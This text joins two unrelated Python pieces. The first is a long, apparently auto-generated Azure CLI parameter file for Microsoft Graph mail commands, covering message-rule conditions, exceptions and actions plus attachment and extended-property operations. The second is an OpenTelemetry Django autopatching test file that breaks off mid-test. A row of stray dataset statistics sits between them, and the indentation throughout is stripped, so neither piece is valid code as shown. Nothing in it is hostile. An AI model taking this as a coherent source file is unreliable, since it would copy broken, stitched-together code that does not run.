c.argument('importance', arg_type=get_enum_type(['low', 'normal', 'high']), help='', arg_group='Exceptions')
c.argument('exceptions_is_approval_request', arg_type=get_three_state_flag(), help='Indicates whether an '
'incoming message must be an approval request in order for the condition or exception to apply.',
arg_group='Exceptions')
c.argument('exceptions_is_automatic_forward', arg_type=get_three_state_flag(), help='Indicates whether an '
'incoming message must be automatically forwarded in order for the condition or exception to apply.',
arg_group='Exceptions')
c.argument('exceptions_is_automatic_reply', arg_type=get_three_state_flag(), help='Indicates whether an '
'incoming message must be an auto reply in order for the condition or exception to apply.',
arg_group='Exceptions')
c.argument('exceptions_is_encrypted', arg_type=get_three_state_flag(), help='Indicates whether an incoming '
'message must be encrypted in order for the condition or exception to apply.',
arg_group='Exceptions')
c.argument('exceptions_is_meeting_request', arg_type=get_three_state_flag(), help='Indicates whether an '
'incoming message must be a meeting request in order for the condition or exception to apply.',
arg_group='Exceptions')
c.argument('exceptions_is_meeting_response', arg_type=get_three_state_flag(), help='Indicates whether an '
'incoming message must be a meeting response in order for the condition or exception to apply.',
arg_group='Exceptions')
c.argument('exceptions_is_non_delivery_report', arg_type=get_three_state_flag(), help='Indicates whether an '
'incoming message must be a non-delivery report in order for the condition or exception to apply.',
arg_group='Exceptions')
c.argument('exceptions_is_permission_controlled', arg_type=get_three_state_flag(), help='Indicates whether an '
'incoming message must be permission controlled (RMS-protected) in order for the condition or '
'exception to apply.', arg_group='Exceptions')
c.argument('exceptions_is_read_receipt', arg_type=get_three_state_flag(), help='Indicates whether an incoming '
'message must be a read receipt in order for the condition or exception to apply.',
arg_group='Exceptions')
c.argument('exceptions_is_signed', arg_type=get_three_state_flag(), help='Indicates whether an incoming '
'message must be S/MIME-signed in order for the condition or exception to apply.',
arg_group='Exceptions')
c.argument('exceptions_is_voicemail', arg_type=get_three_state_flag(), help='Indicates whether an incoming '
'message must be a voice mail in order for the condition or exception to apply.',
arg_group='Exceptions')
c.argument('message_action_flag', arg_type=get_enum_type(['any', 'call', 'doNotForward', 'followUp', 'fyi',
'forward', 'noResponseNecessary', 'read', 'reply',
'replyToAll', 'review']), help='',
arg_group='Exceptions')
c.argument('not_sent_to_me', arg_type=get_three_state_flag(), help='Indicates whether the owner of the mailbox '
'must not be a recipient of an incoming message in order for the condition or exception to apply.',
arg_group='Exceptions')
c.argument('recipient_contains', nargs='+', help='Represents the strings that appear in either the '
'toRecipients or ccRecipients properties of an incoming message in order for the condition or '
'exception to apply.', arg_group='Exceptions')
c.argument('sender_contains', nargs='+', help='Represents the strings that appear in the from property of an '
'incoming message in order for the condition or exception to apply.', arg_group='Exceptions')
c.argument('sensitivity', arg_type=get_enum_type(['normal', 'personal', 'private', 'confidential']), help='',
arg_group='Exceptions')
c.argument('sent_cc_me', arg_type=get_three_state_flag(), help='Indicates whether the owner of the mailbox '
'must be in the ccRecipients property of an incoming message in order for the condition or '
'exception to apply.', arg_group='Exceptions')
c.argument('sent_only_to_me', arg_type=get_three_state_flag(), help='Indicates whether the owner of the '
'mailbox must be the only recipient in an incoming message in order for the condition or exception '
'to apply.', arg_group='Exceptions')
c.argument('sent_to_addresses', type=validate_file_or_dict, help='Represents the email addresses that an '
'incoming message must have been sent to in order for the condition or exception to apply. Expected '
'value: json-string/@json-file.', arg_group='Exceptions')
c.argument('sent_to_me', arg_type=get_three_state_flag(), help='Indicates whether the owner of the mailbox '
'must be in the toRecipients property of an incoming message in order for the condition or '
'exception to apply.', arg_group='Exceptions')
c.argument('sent_to_or_cc_me', arg_type=get_three_state_flag(), help='Indicates whether the owner of the '
'mailbox must be in either a toRecipients or ccRecipients property of an incoming message in order '
'for the condition or exception to apply.', arg_group='Exceptions')
c.argument('subject_contains', nargs='+', help='Represents the strings that appear in the subject of an '
'incoming message in order for the condition or exception to apply.', arg_group='Exceptions')
c.argument('within_size_range', action=AddWithinSizeRange, nargs='+', help='sizeRange',
arg_group='Exceptions')
c.argument('microsoft_graph_message_rule_predicates_body_contains', nargs='+', help='Represents the strings '
'that should appear in the body of an incoming message in order for the condition or exception to '
'apply.', arg_group='Conditions')
c.argument('microsoft_graph_message_rule_predicates_body_or_subject_contains_body_or_subject_contains',
nargs='+', help='Represents the strings that should appear in the body or subject of an incoming '
'message in order for the condition or exception to apply.', arg_group='Conditions')
c.argument('microsoft_graph_message_rule_predicates_categories', nargs='+', help='Represents the categories '
'that an incoming message should be labeled with in order for the condition or exception to apply.',
arg_group='Conditions')
c.argument('microsoft_graph_message_rule_predicates_from_addresses', type=validate_file_or_dict,
help='Represents the specific sender email addresses of an incoming message in order for the '
'condition or exception to apply. Expected value: json-string/@json-file.', arg_group='Conditions')
c.argument('boolean_has_attachments', arg_type=get_three_state_flag(), help='Indicates whether an incoming '
'message must have attachments in order for the condition or exception to apply.',
arg_group='Conditions')
c.argument('microsoft_graph_message_rule_predicates_header_contains', nargs='+', help='Represents the strings '
'that appear in the headers of an incoming message in order for the condition or exception to '
'apply.', arg_group='Conditions')
c.argument('microsoft_graph_importance', arg_type=get_enum_type(['low', 'normal', 'high']), help='',
arg_group='Conditions')
c.argument('is_approval_request', arg_type=get_three_state_flag(), help='Indicates whether an incoming message '
'must be an approval request in order for the condition or exception to apply.',
arg_group='Conditions')
c.argument('is_automatic_forward', arg_type=get_three_state_flag(), help='Indicates whether an incoming '
'message must be automatically forwarded in order for the condition or exception to apply.',
arg_group='Conditions')
c.argument('is_automatic_reply', arg_type=get_three_state_flag(), help='Indicates whether an incoming message '
'must be an auto reply in order for the condition or exception to apply.', arg_group='Conditions')
c.argument('is_encrypted', arg_type=get_three_state_flag(), help='Indicates whether an incoming message must '
'be encrypted in order for the condition or exception to apply.', arg_group='Conditions')
c.argument('is_meeting_request', arg_type=get_three_state_flag(), help='Indicates whether an incoming message '
'must be a meeting request in order for the condition or exception to apply.',
arg_group='Conditions')
c.argument('is_meeting_response', arg_type=get_three_state_flag(), help='Indicates whether an incoming message '
'must be a meeting response in order for the condition or exception to apply.',
arg_group='Conditions')
c.argument('is_non_delivery_report', arg_type=get_three_state_flag(), help='Indicates whether an incoming '
'message must be a non-delivery report in order for the condition or exception to apply.',
arg_group='Conditions')
c.argument('is_permission_controlled', arg_type=get_three_state_flag(), help='Indicates whether an incoming '
'message must be permission controlled (RMS-protected) in order for the condition or exception to '
'apply.', arg_group='Conditions')
c.argument('is_read_receipt', arg_type=get_three_state_flag(), help='Indicates whether an incoming message '
'must be a read receipt in order for the condition or exception to apply.', arg_group='Conditions')
c.argument('is_signed', arg_type=get_three_state_flag(), help='Indicates whether an incoming message must be '
'S/MIME-signed in order for the condition or exception to apply.', arg_group='Conditions')
c.argument('is_voicemail', arg_type=get_three_state_flag(), help='Indicates whether an incoming message must '
'be a voice mail in order for the condition or exception to apply.', arg_group='Conditions')
c.argument('microsoft_graph_message_action_flag_message_action_flag', arg_type=get_enum_type(['any', 'call',
'doNotForward',
'followUp',
'fyi', 'forward',
'noResponseNecessary',
'read', 'reply',
'replyToAll',
'review']),
help='', arg_group='Conditions')
c.argument('boolean_not_sent_to_me', arg_type=get_three_state_flag(), help='Indicates whether the owner of the '
'mailbox must not be a recipient of an incoming message in order for the condition or exception to '
'apply.', arg_group='Conditions')
c.argument('microsoft_graph_message_rule_predicates_recipient_contains', nargs='+', help='Represents the '
'strings that appear in either the toRecipients or ccRecipients properties of an incoming message '
'in order for the condition or exception to apply.', arg_group='Conditions')
c.argument('microsoft_graph_message_rule_predicates_sender_contains', nargs='+', help='Represents the strings '
'that appear in the from property of an incoming message in order for the condition or exception to '
'apply.', arg_group='Conditions')
c.argument('microsoft_graph_sensitivity', arg_type=get_enum_type(['normal', 'personal', 'private',
'confidential']), help='',
arg_group='Conditions')
c.argument('boolean_sent_cc_me', arg_type=get_three_state_flag(), help='Indicates whether the owner of the '
'mailbox must be in the ccRecipients property of an incoming message in order for the condition or '
'exception to apply.', arg_group='Conditions')
c.argument('boolean_sent_only_to_me', arg_type=get_three_state_flag(), help='Indicates whether the owner of '
'the mailbox must be the only recipient in an incoming message in order for the condition or '
'exception to apply.', arg_group='Conditions')
c.argument('microsoft_graph_message_rule_predicates_sent_to_addresses_sent_to_addresses',
type=validate_file_or_dict, help='Represents the email addresses that an incoming message must have '
'been sent to in order for the condition or exception to apply. Expected value: '
'json-string/@json-file.', arg_group='Conditions')
c.argument('boolean_sent_to_me', arg_type=get_three_state_flag(), help='Indicates whether the owner of the '
'mailbox must be in the toRecipients property of an incoming message in order for the condition or '
'exception to apply.', arg_group='Conditions')
c.argument('boolean_sent_to_or_cc_me', arg_type=get_three_state_flag(), help='Indicates whether the owner of '
'the mailbox must be in either a toRecipients or ccRecipients property of an incoming message in '
'order for the condition or exception to apply.', arg_group='Conditions')
c.argument('microsoft_graph_message_rule_predicates_subject_contains', nargs='+', help='Represents the strings '
'that appear in the subject of an incoming message in order for the condition or exception to '
'apply.', arg_group='Conditions')
c.argument('microsoft_graph_size_range_within_size_range', action=AddWithinSizeRange, nargs='+',
help='sizeRange', arg_group='Conditions')
c.argument('assign_categories', nargs='+', help='A list of categories to be assigned to a message.',
arg_group='Actions')
c.argument('copy_to_folder', type=str, help='The ID of a folder that a message is to be copied to.',
arg_group='Actions')
c.argument('delete', arg_type=get_three_state_flag(), help='Indicates whether a message should be moved to the '
'Deleted Items folder.', arg_group='Actions')
c.argument('forward_as_attachment_to', type=validate_file_or_dict, help='The email addresses of the recipients '
'to which a message should be forwarded as an attachment. Expected value: json-string/@json-file.',
arg_group='Actions')
c.argument('forward_to', type=validate_file_or_dict, help='The email addresses of the recipients to which a '
'message should be forwarded. Expected value: json-string/@json-file.', arg_group='Actions')
c.argument('mark_as_read', arg_type=get_three_state_flag(), help='Indicates whether a message should be marked '
'as read.', arg_group='Actions')
c.argument('mark_importance', arg_type=get_enum_type(['low', 'normal', 'high']), help='', arg_group='Actions')
c.argument('move_to_folder', type=str, help='The ID of the folder that a message will be moved to.',
arg_group='Actions')
c.argument('permanent_delete', arg_type=get_three_state_flag(), help='Indicates whether a message should be '
'permanently deleted and not saved to the Deleted Items folder.', arg_group='Actions')
c.argument('redirect_to', type=validate_file_or_dict, help='The email addresses to which a message should be '
'redirected. Expected value: json-string/@json-file.', arg_group='Actions')
c.argument('stop_processing_rules', arg_type=get_three_state_flag(), help='Indicates whether subsequent rules '
'should be evaluated.', arg_group='Actions')
with self.argument_context('mail user-mail-folder update-multi-value-extended-property') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('mail_folder_id', type=str, help='key: id of mailFolder')
c.argument('multi_value_legacy_extended_property_id', type=str, help='key: id of '
'multiValueLegacyExtendedProperty')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('value', nargs='+', help='A collection of property values.')
with self.argument_context('mail user-mail-folder update-single-value-extended-property') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('mail_folder_id', type=str, help='key: id of mailFolder')
c.argument('single_value_legacy_extended_property_id', type=str, help='key: id of '
'singleValueLegacyExtendedProperty')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('value', type=str, help='A property value.')
with self.argument_context('mail user-mail-folder-message create-attachment') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('mail_folder_id', type=str, help='key: id of mailFolder')
c.argument('message_id', type=str, help='key: id of message')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('content_type', type=str, help='The MIME type.')
c.argument('is_inline', arg_type=get_three_state_flag(), help='true if the attachment is an inline attachment; '
'otherwise, false.')
c.argument('last_modified_date_time', help='The Timestamp type represents date and time information using ISO '
'8601 format and is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like '
'this: \'2014-01-01T00:00:00Z\'')
c.argument('name', type=str, help='The attachment\'s file name.')
c.argument('size', type=int, help='The length of the attachment in bytes.')
with self.argument_context('mail user-mail-folder-message create-extension') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('mail_folder_id', type=str, help='key: id of mailFolder')
c.argument('message_id', type=str, help='key: id of message')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
with self.argument_context('mail user-mail-folder-message create-multi-value-extended-property') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('mail_folder_id', type=str, help='key: id of mailFolder')
c.argument('message_id', type=str, help='key: id of message')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('value', nargs='+', help='A collection of property values.')
with self.argument_context('mail user-mail-folder-message create-single-value-extended-property') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('mail_folder_id', type=str, help='key: id of mailFolder')
c.argument('message_id', type=str, help='key: id of message')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('value', type=str, help='A property value.')
with self.argument_context('mail user-mail-folder-message delete-attachment') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('mail_folder_id', type=str, help='key: id of mailFolder')
c.argument('message_id', type=str, help='key: id of message')
c.argument('attachment_id', type=str, help='key: id of attachment')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('mail user-mail-folder-message delete-extension') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('mail_folder_id', type=str, help='key: id of mailFolder')
c.argument('message_id', type=str, help='key: id of message')
c.argument('extension_id', type=str, help='key: id of extension')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('mail user-mail-folder-message delete-multi-value-extended-property') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('mail_folder_id', type=str, help='key: id of mailFolder')
c.argument('message_id', type=str, help='key: id of message')
c.argument('multi_value_legacy_extended_property_id', type=str, help='key: id of '
'multiValueLegacyExtendedProperty')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('mail user-mail-folder-message delete-single-value-extended-property') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('mail_folder_id', type=str, help='key: id of mailFolder')
c.argument('message_id', type=str, help='key: id of message')
c.argument('single_value_legacy_extended_property_id', type=str, help='key: id of '
'singleValueLegacyExtendedProperty')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('mail user-mail-folder-message list-attachment') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('mail_folder_id', type=str, help='key: id of mailFolder')
c.argument('message_id', type=str, help='key: id of message')
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('mail user-mail-folder-message list-extension') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('mail_folder_id', type=str, help='key: id of mailFolder')
c.argument('message_id', type=str, help='key: id of message')
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('mail user-mail-folder-message list-multi-value-extended-property') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('mail_folder_id', type=str, help='key: id of mailFolder')
c.argument('message_id', type=str, help='key: id of message')
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('mail user-mail-folder-message list-single-value-extended-property') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('mail_folder_id', type=str, help='key: id of mailFolder')
c.argument('message_id', type=str, help='key: id of message')
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('mail user-mail-folder-message show-attachment') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('mail_folder_id', type=str, help='key: id of mailFolder')
c.argument('message_id', type=str, help='key: id of message')
c.argument('attachment_id', type=str, help='key: id of attachment')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('mail user-mail-folder-message show-extension') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('mail_folder_id', type=str, help='key: id of mailFolder')
c.argument('message_id', type=str, help='key: id of message')
c.argument('extension_id', type=str, help='key: id of extension')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('mail user-mail-folder-message show-multi-value-extended-property') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('mail_folder_id', type=str, help='key: id of mailFolder')
c.argument('message_id', type=str, help='key: id of message')
c.argument('multi_value_legacy_extended_property_id', type=str, help='key: id of '
'multiValueLegacyExtendedProperty')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('mail user-mail-folder-message show-single-value-extended-property') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('mail_folder_id', type=str, help='key: id of mailFolder')
c.argument('message_id', type=str, help='key: id of message')
c.argument('single_value_legacy_extended_property_id', type=str, help='key: id of '
'singleValueLegacyExtendedProperty')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('mail user-mail-folder-message update-attachment') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('mail_folder_id', type=str, help='key: id of mailFolder')
c.argument('message_id', type=str, help='key: id of message')
c.argument('attachment_id', type=str, help='key: id of attachment')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('content_type', type=str, help='The MIME type.')
c.argument('is_inline', arg_type=get_three_state_flag(), help='true if the attachment is an inline attachment; '
'otherwise, false.')
c.argument('last_modified_date_time', help='The Timestamp type represents date and time information using ISO '
'8601 format and is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like '
'this: \'2014-01-01T00:00:00Z\'')
c.argument('name', type=str, help='The attachment\'s file name.')
c.argument('size', type=int, help='The length of the attachment in bytes.')
with self.argument_context('mail user-mail-folder-message update-extension') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('mail_folder_id', type=str, help='key: id of mailFolder')
c.argument('message_id', type=str, help='key: id of message')
c.argument('extension_id', type=str, help='key: id of extension')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
with self.argument_context('mail user-mail-folder-message update-multi-value-extended-property') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('mail_folder_id', type=str, help='key: id of mailFolder')
c.argument('message_id', type=str, help='key: id of message')
c.argument('multi_value_legacy_extended_property_id', type=str, help='key: id of '
'multiValueLegacyExtendedProperty')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('value', nargs='+', help='A collection of property values.')
with self.argument_context('mail user-mail-folder-message update-single-value-extended-property') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('mail_folder_id', type=str, help='key: id of mailFolder')
c.argument('message_id', type=str, help='key: id of message')
c.argument('single_value_legacy_extended_property_id', type=str, help='key: id of '
'singleValueLegacyExtendedProperty')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('value', type=str, help='A property value.')
with self.argument_context('mail user-message create-attachment') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('message_id', type=str, help='key: id of message')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('content_type', type=str, help='The MIME type.')
c.argument('is_inline', arg_type=get_three_state_flag(), help='true if the attachment is an inline attachment; '
'otherwise, false.')
c.argument('last_modified_date_time', help='The Timestamp type represents date and time information using ISO '
'8601 format and is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like '
'this: \'2014-01-01T00:00:00Z\'')
c.argument('name', type=str, help='The attachment\'s file name.')
c.argument('size', type=int, help='The length of the attachment in bytes.')
with self.argument_context('mail user-message create-extension') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('message_id', type=str, help='key: id of message')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
with self.argument_context('mail user-message create-multi-value-extended-property') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('message_id', type=str, help='key: id of message')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('value', nargs='+', help='A collection of property values.')
with self.argument_context('mail user-message create-single-value-extended-property') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('message_id', type=str, help='key: id of message')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('value', type=str, help='A property value.')
with self.argument_context('mail user-message delete-attachment') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('message_id', type=str, help='key: id of message')
c.argument('attachment_id', type=str, help='key: id of attachment')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('mail user-message delete-extension') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('message_id', type=str, help='key: id of message')
c.argument('extension_id', type=str, help='key: id of extension')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('mail user-message delete-multi-value-extended-property') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('message_id', type=str, help='key: id of message')
c.argument('multi_value_legacy_extended_property_id', type=str, help='key: id of '
'multiValueLegacyExtendedProperty')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('mail user-message delete-single-value-extended-property') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('message_id', type=str, help='key: id of message')
c.argument('single_value_legacy_extended_property_id', type=str, help='key: id of '
'singleValueLegacyExtendedProperty')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('mail user-message list-attachment') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('message_id', type=str, help='key: id of message')
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('mail user-message list-extension') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('message_id', type=str, help='key: id of message')
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('mail user-message list-multi-value-extended-property') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('message_id', type=str, help='key: id of message')
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('mail user-message list-single-value-extended-property') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('message_id', type=str, help='key: id of message')
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('mail user-message show-attachment') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('message_id', type=str, help='key: id of message')
c.argument('attachment_id', type=str, help='key: id of attachment')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('mail user-message show-extension') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('message_id', type=str, help='key: id of message')
c.argument('extension_id', type=str, help='key: id of extension')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('mail user-message show-multi-value-extended-property') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('message_id', type=str, help='key: id of message')
c.argument('multi_value_legacy_extended_property_id', type=str, help='key: id of '
'multiValueLegacyExtendedProperty')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('mail user-message show-single-value-extended-property') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('message_id', type=str, help='key: id of message')
c.argument('single_value_legacy_extended_property_id', type=str, help='key: id of '
'singleValueLegacyExtendedProperty')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('mail user-message update-attachment') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('message_id', type=str, help='key: id of message')
c.argument('attachment_id', type=str, help='key: id of attachment')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('content_type', type=str, help='The MIME type.')
c.argument('is_inline', arg_type=get_three_state_flag(), help='true if the attachment is an inline attachment; '
'otherwise, false.')
c.argument('last_modified_date_time', help='The Timestamp type represents date and time information using ISO '
'8601 format and is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like '
'this: \'2014-01-01T00:00:00Z\'')
c.argument('name', type=str, help='The attachment\'s file name.')
c.argument('size', type=int, help='The length of the attachment in bytes.')
with self.argument_context('mail user-message update-extension') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('message_id', type=str, help='key: id of message')
c.argument('extension_id', type=str, help='key: id of extension')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
with self.argument_context('mail user-message update-multi-value-extended-property') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('message_id', type=str, help='key: id of message')
c.argument('multi_value_legacy_extended_property_id', type=str, help='key: id of '
'multiValueLegacyExtendedProperty')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('value', nargs='+', help='A collection of property values.')
with self.argument_context('mail user-message update-single-value-extended-property') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('message_id', type=str, help='key: id of message')
c.argument('single_value_legacy_extended_property_id', type=str, help='key: id of '
'singleValueLegacyExtendedProperty')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('value', type=str, help='A property value.')
| 81.572043
| 125
| 0.644099
| 14,713
| 113,793
| 4.843064
| 0.029158
| 0.091571
| 0.049708
| 0.047799
| 0.987187
| 0.986457
| 0.985657
| 0.984394
| 0.983426
| 0.982977
| 0
| 0.004498
| 0.239997
| 113,793
| 1,394
| 126
| 81.63056
| 0.819433
| 0.00471
| 0
| 0.919753
| 0
| 0.015432
| 0.497631
| 0.069549
| 0
| 0
| 0
| 0
| 0
| 1
| 0.000772
| false
| 0
| 0.010031
| 0
| 0.010802
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b778fc6f6b0e273e4d19c5784d476f695a937e1e
| 5,385
|
py
|
Python
|
tests/contrib/django/test_autopatching.py
|
ocelotl/opentelemetry-auto-instr-python-1
|
f5c47bd1ee492ffde298794f283031c22891f60b
|
[
"BSD-3-Clause"
] | 2
|
2020-03-04T17:33:22.000Z
|
2021-01-20T14:20:10.000Z
|
tests/contrib/django/test_autopatching.py
|
ocelotl/opentelemetry-auto-instr-python-1
|
f5c47bd1ee492ffde298794f283031c22891f60b
|
[
"BSD-3-Clause"
] | 4
|
2019-11-25T00:11:16.000Z
|
2021-05-13T20:43:50.000Z
|
tests/contrib/django/test_autopatching.py
|
ocelotl/opentelemetry-auto-instr-python-1
|
f5c47bd1ee492ffde298794f283031c22891f60b
|
[
"BSD-3-Clause"
] | 3
|
2020-02-05T14:54:25.000Z
|
2020-03-23T02:51:27.000Z
|
# Copyright 2019, OpenTelemetry Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import django
from oteltrace.monkey import patch
from .utils import DjangoTraceTestCase
from django.conf import settings
from unittest import skipIf
class DjangoAutopatchTest(DjangoTraceTestCase):
def setUp(self):
super(DjangoAutopatchTest, self).setUp()
patch(django=True)
django.setup()
@skipIf(django.VERSION >= (1, 10), 'skip if version above 1.10')
def test_autopatching_middleware_classes(self):
assert django._opentelemetry_patch
assert 'oteltrace.contrib.django' in settings.INSTALLED_APPS
assert settings.MIDDLEWARE_CLASSES[0] == 'oteltrace.contrib.django.TraceMiddleware'
assert settings.MIDDLEWARE_CLASSES[-1] == 'oteltrace.contrib.django.TraceExceptionMiddleware'
@skipIf(django.VERSION >= (1, 10), 'skip if version above 1.10')
def test_autopatching_twice_middleware_classes(self):
assert django._opentelemetry_patch
# Call django.setup() twice and ensure we don't add a duplicate tracer
django.setup()
found_app = settings.INSTALLED_APPS.count('oteltrace.contrib.django')
assert found_app == 1
assert settings.MIDDLEWARE_CLASSES[0] == 'oteltrace.contrib.django.TraceMiddleware'
assert settings.MIDDLEWARE_CLASSES[-1] == 'oteltrace.contrib.django.TraceExceptionMiddleware'
found_mw = settings.MIDDLEWARE_CLASSES.count('oteltrace.contrib.django.TraceMiddleware')
assert found_mw == 1
found_mw = settings.MIDDLEWARE_CLASSES.count('oteltrace.contrib.django.TraceExceptionMiddleware')
assert found_mw == 1
@skipIf(django.VERSION < (1, 10), 'skip if version is below 1.10')
def test_autopatching_middleware(self):
assert django._opentelemetry_patch
assert 'oteltrace.contrib.django' in settings.INSTALLED_APPS
assert settings.MIDDLEWARE[0] == 'oteltrace.contrib.django.TraceMiddleware'
# MIDDLEWARE_CLASSES gets created internally in django 1.10 & 1.11 but doesn't
# exist at all in 2.0.
assert not getattr(settings, 'MIDDLEWARE_CLASSES', None) or \
'oteltrace.contrib.django.TraceMiddleware' \
not in settings.MIDDLEWARE_CLASSES
assert settings.MIDDLEWARE[-1] == 'oteltrace.contrib.django.TraceExceptionMiddleware'
assert not getattr(settings, 'MIDDLEWARE_CLASSES', None) or \
'oteltrace.contrib.django.TraceExceptionMiddleware' \
not in settings.MIDDLEWARE_CLASSES
@skipIf(django.VERSION < (1, 10), 'skip if version is below 1.10')
def test_autopatching_twice_middleware(self):
assert django._opentelemetry_patch
# Call django.setup() twice and ensure we don't add a duplicate tracer
django.setup()
found_app = settings.INSTALLED_APPS.count('oteltrace.contrib.django')
assert found_app == 1
